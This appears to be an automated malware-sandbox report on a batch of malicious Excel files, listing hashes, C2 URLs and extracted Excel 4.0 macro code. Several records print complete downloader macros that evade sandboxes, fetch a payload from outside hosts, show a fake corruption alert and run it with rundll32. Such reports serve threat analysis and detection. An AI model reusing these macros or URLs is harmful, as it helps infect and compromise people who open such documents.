{"version":"0.2","sample":{"sample":"","kind":"file","target":"707c9d05dff489892ba2eef123a7d70bccff7ea49943057199b533cf5686fe67"},"analysis":{"reported":"2020-04-09T16:16:59Z","score":10},"files":[{"filename":"707c9d05dff489892ba2eef123a7d70bccff7ea49943057199b533cf5686fe67","filesize":212992,"md5":"edc5e9e55b767671a5b926d6cd4f2a4e","sha1":"af3063eb5a57324ddff291348e1f0b91a10ff5ac","sha256":"707c9d05dff489892ba2eef123a7d70bccff7ea49943057199b533cf5686fe67","sha512":"dc4ac2162ea8b80572ba182d0422416d5081d39021748e1fd128967971d1b34c3ccf02f5b4ab8d15f923322181b612fcc864952b56909650ba5cea3f1c5e2c96","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"707c9d05dff489892ba2eef123a7d70bccff7ea49943057199b533cf5686fe67.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9HNPd4HKSu\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"70aa65cc2cc7f03d3c35469211a8475094da83739f8f6d37c5d0874d12ffe3f7"},"analysis":{"reported":"2020-04-09T16:16:59Z","score":10},"files":[{"filename":"70aa65cc2cc7f03d3c35469211a8475094da83739f8f6d37c5d0874d12ffe3f7","filesize":185344,"md5":"68620e1bc3e72c14876ecd9457cd6a3a","sha1":"21f485036f2b1a35447ff7bad374169ed1f78122","sha256":"70aa65cc2cc7f03d3c35469211a8475094da83739f8f6d37c5d0874d12ffe3f7","sha512":"377738edb5a2ef538a4cd3b5c3a0e23dca49f0fa37d6a972ae763c0efe4ecc97c7e965005cd884ddea364ec3b8d4c6924741302c358a8f9fe1d5462ec1f3a82e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"70aa65cc2cc7f03d3c35469211a8475094da83739f8f6d37c5d0874d12ffe3f7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"70ba835ba187cf75287d184888ca1ec0db1212a2be0076f158a5cdd1417ec5be"},"analysis":{"reported":"2020-04-09T16:16:59Z","score":10},"files":[{"filename":"70ba835ba187cf75287d184888ca1ec0db1212a2be0076f158a5cdd1417ec5be","filesize":160768,"md5":"3110af8a28d3a17eaf8411c66e9f4949","sha1":"13d35c6a71ee02362905982cfdd4f19ea7971fb0","sha256":"70ba835ba187cf75287d184888ca1ec0db1212a2be0076f158a5cdd1417ec5be","sha512":"1df9cb807a776f9130f0873cff97c20257c6caf9c5558870c8d884254367b813a7980ef07fb7c877550bfbb62b50b23ba6d9e1671eea53f5c5adad9fe823eb47","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"70ba835ba187cf75287d184888ca1ec0db1212a2be0076f158a5cdd1417ec5be.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"L17rCodRw1\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"70c4bea5011699f62dcc17dd839a3d1d213930ae8fb8ed92e1990dd2e50c695c"},"analysis":{"reported":"2020-04-09T16:16:59Z","score":10},"files":[{"filename":"70c4bea5011699f62dcc17dd839a3d1d213930ae8fb8ed92e1990dd2e50c695c","filesize":152576,"md5":"144b7925d4c6239edf5129c7a80c8e50","sha1":"6644137659e2f84ed93743e8b7831f0ffa3ea60e","sha256":"70c4bea5011699f62dcc17dd839a3d1d213930ae8fb8ed92e1990dd2e50c695c","sha512":"97f4f40474f8a27424e3e697b4f26d776bf9d64d654a005d6edac99dc3e197701786db09da6926b7b82a369a5ff310eecd39ed3f7070d129e0e630bf17fee9d2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"70c4bea5011699f62dcc17dd839a3d1d213930ae8fb8ed92e1990dd2e50c695c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"X78m8x2fE5\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"70cb6e93d614270055f26ee8df0bf45433584f9c1685011a1374da2433c4df6f"},"analysis":{"reported":"2020-04-09T16:16:59Z","score":10},"files":[{"filename":"70cb6e93d614270055f26ee8df0bf45433584f9c1685011a1374da2433c4df6f","filesize":112128,"md5":"cfdf5cc6c2b2ab734da943af94ea9fad","sha1":"aeb2e6fd8b7b7a35c5c7953da4e2a6c25836db68","sha256":"70cb6e93d614270055f26ee8df0bf45433584f9c1685011a1374da2433c4df6f","sha512":"d22cdadd0657f4dfa64a7fa6ffc2365e2cf424b45b5d16e3af503f2ef2c431cd0dd4a3628fff481d2f759864492f4d7b92ab1c9193e82b8ab3337af49d33331f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"70cb6e93d614270055f26ee8df0bf45433584f9c1685011a1374da2433c4df6f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"70cd593da955416478eea731275574a64d7e062b6270c8935f1f04ca66ea6498"},"analysis":{"reported":"2020-04-09T16:16:59Z","score":10},"files":[{"filename":"70cd593da955416478eea731275574a64d7e062b6270c8935f1f04ca66ea6498","filesize":185344,"md5":"29d9d883b793d320fa46d8be532e0476","sha1":"bd22c11826378c6180a7a3158a9a50dc4eddd4b4","sha256":"70cd593da955416478eea731275574a64d7e062b6270c8935f1f04ca66ea6498","sha512":"57fb9505dcaed74af912583981c3716442c71a26e114cf5e7a0ff0389a16f4452879751395ec5762a5afe504eceefdbd25d0ee2b76876f3a36d57a1d7edebe9e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"70cd593da955416478eea731275574a64d7e062b6270c8935f1f04ca66ea6498.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"70e6756a5a84d8383f846e78b20376468a64e440234e056a50765837973b3ea9"},"analysis":{"reported":"2020-04-09T16:16:59Z","score":10},"files":[{"filename":"70e6756a5a84d8383f846e78b20376468a64e440234e056a50765837973b3ea9","filesize":214528,"md5":"585b2a0fdd3dfac053455ff76f45a1ed","sha1":"a236ae41df83acee252349c7d8184ee3c768ace6","sha256":"70e6756a5a84d8383f846e78b20376468a64e440234e056a50765837973b3ea9","sha512":"b68fc25946c02ba8c1068215c08ba2262351dedcb3c0c1995e4aa408c908ca5d0c5c13ec444d1deb3b412a5cfa73561cceabe5f35d9a154afca443e5761ed6d5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"70e6756a5a84d8383f846e78b20376468a64e440234e056a50765837973b3ea9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yStpWindly\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"70e88d1deb6cbfd4c118c52535fb5af3e641651d3d065e0760fc24d55a4c1098"},"analysis":{"reported":"2020-04-09T16:16:59Z","score":10},"files":[{"filename":"70e88d1deb6cbfd4c118c52535fb5af3e641651d3d065e0760fc24d55a4c1098","filesize":152576,"md5":"7cddbd37589613a6c389b3331a8fd8af","sha1":"f8c1e65419f5a99cbfa4c8ece81cf237cb794e6d","sha256":"70e88d1deb6cbfd4c118c52535fb5af3e641651d3d065e0760fc24d55a4c1098","sha512":"c4e98ec5ec5ac46a6a6139460fbfda0c5df0d137fd39acc68a7a4e490b502f7aeb5d1b2ae8eb03a9d7a74c0d380509d032d4c604135b4a0a18d98b20d473b381","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"70e88d1deb6cbfd4c118c52535fb5af3e641651d3d065e0760fc24d55a4c1098.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HcfgCvhBjQ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"70ef9f7e452bc19c726473c4494df7f8dd01f0a387f9e7a0920533a6d7a1f757"},"analysis":{"reported":"2020-04-09T16:16:59Z","score":10},"files":[{"filename":"70ef9f7e452bc19c726473c4494df7f8dd01f0a387f9e7a0920533a6d7a1f757","filesize":206336,"md5":"543331960461510f20874dae40dc2ab1","sha1":"c938db66286f79ed34be346ed8cb3b4e59cc703f","sha256":"70ef9f7e452bc19c726473c4494df7f8dd01f0a387f9e7a0920533a6d7a1f757","sha512":"dd298376daf7e3b69eec735882841564242937ef8c483f5f7cfb081500188a3b138fb4843e3dc90d552c4bf04833217a7a09c8f71782b0422417f2afc70ed012","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"70ef9f7e452bc19c726473c4494df7f8dd01f0a387f9e7a0920533a6d7a1f757.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"D8WICMFd7Q\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7102eef78b35bf0775292c947c3db68296afa8dfbcffca7ebe35ae1080b67677"},"analysis":{"reported":"2020-04-09T16:16:59Z","score":10},"files":[{"filename":"7102eef78b35bf0775292c947c3db68296afa8dfbcffca7ebe35ae1080b67677","filesize":206336,"md5":"f690324f8cfb8670966201eb2541e2c7","sha1":"591df5a3d0c9bd33e6049d327e154a8398e1e7c2","sha256":"7102eef78b35bf0775292c947c3db68296afa8dfbcffca7ebe35ae1080b67677","sha512":"5d35a16b2b92b187cfdfadac72f5699fda94409038b3c549c8fdc1797a03600b6c4dc529978b00ee561ce8d32207b62b605a8d5bd4a08610eb8486a1d3fe2f0a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7102eef78b35bf0775292c947c3db68296afa8dfbcffca7ebe35ae1080b67677.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ojX4I8xfj7\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7110befcc73f90bde64623e6a4ef03ba885802cbdc5483d1df8ec69627c1eca5"},"analysis":{"reported":"2020-04-09T16:17:00Z","score":10},"files":[{"filename":"7110befcc73f90bde64623e6a4ef03ba885802cbdc5483d1df8ec69627c1eca5","filesize":207360,"md5":"08ac885b1c47d2f6673ee67b44881965","sha1":"b13fdc2f11bece938bc517cae94aad85059d06f6","sha256":"7110befcc73f90bde64623e6a4ef03ba885802cbdc5483d1df8ec69627c1eca5","sha512":"616244d9888e5e19ca19c3c79c18e40998c288cec4fd4a8ebc45031577b45fa70f4786bba57ece18cd4e24e168ae02810ca30d9583089caa5c25a8faa90ede20","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7110befcc73f90bde64623e6a4ef03ba885802cbdc5483d1df8ec69627c1eca5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-cran.php","https://narensyndicate.com/wp-cran.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-cran.php\",\"c:\\Users\\Public\\cskc75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-cran.php\",\"c:\\Users\\Public\\cskc75ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cskc75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5iMcmWD6At\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"71133c05a10639164a2b7c9e17d631891adda5299c98d998dcc6a841266cbf67"},"analysis":{"reported":"2020-04-09T16:17:00Z","score":10},"files":[{"filename":"71133c05a10639164a2b7c9e17d631891adda5299c98d998dcc6a841266cbf67","filesize":185344,"md5":"798cbdcbabd0d900d86c3a8f6000fc9c","sha1":"e680aa81130644f25643a1fe242d4f2f764b2989","sha256":"71133c05a10639164a2b7c9e17d631891adda5299c98d998dcc6a841266cbf67","sha512":"ba9daebfd9b3cae6071605a9fe324241f4ab644ff2b53bdfc196a3bdb91b239afc54a73ab5f74d5a0e2dcd254a9096c5cdeb37754725d753cb3b89cdbabefab5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"71133c05a10639164a2b7c9e17d631891adda5299c98d998dcc6a841266cbf67.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7122262ea5e77fa22628080845db35075f61e32fcf7ac917075774767b2490db"},"analysis":{"reported":"2020-04-09T16:17:00Z","score":10},"files":[{"filename":"7122262ea5e77fa22628080845db35075f61e32fcf7ac917075774767b2490db","filesize":185344,"md5":"b6fe709153c3de70c14be82cc8d69f19","sha1":"06ad1aa75b26e6701135d9610dc56e5a08b35fc2","sha256":"7122262ea5e77fa22628080845db35075f61e32fcf7ac917075774767b2490db","sha512":"53549f8b8beafa403d6e096ff8b149bd7af2e2bb9d7109f3d157e148c7692f8f6c45c440be3e0fe66f2e2318a06f924a7703593e7e6ff47c95822747c30991b4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7122262ea5e77fa22628080845db35075f61e32fcf7ac917075774767b2490db.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7128180900004da3b91ec56462e5e3153ba24d1a809c9b51235cab1cd720939c"},"analysis":{"reported":"2020-04-09T16:17:00Z","score":10},"files":[{"filename":"7128180900004da3b91ec56462e5e3153ba24d1a809c9b51235cab1cd720939c","filesize":209920,"md5":"531fd713378e3240a4634a01ae1012ae","sha1":"9a6bea14f45bed274e914825d4f0cac051ecc7ab","sha256":"7128180900004da3b91ec56462e5e3153ba24d1a809c9b51235cab1cd720939c","sha512":"1d0b278c3ec6cdbdb71f9af5c4f54924f77001df185871946675c725bcbe5d38d3db1e15fdafd439120f5104995620c0c830314a0edc6991ac03ca1c2b508f02","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7128180900004da3b91ec56462e5e3153ba24d1a809c9b51235cab1cd720939c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"acyUF4Cwau\",TRUE)\nGOTO(R$0C$16)"}}}]}
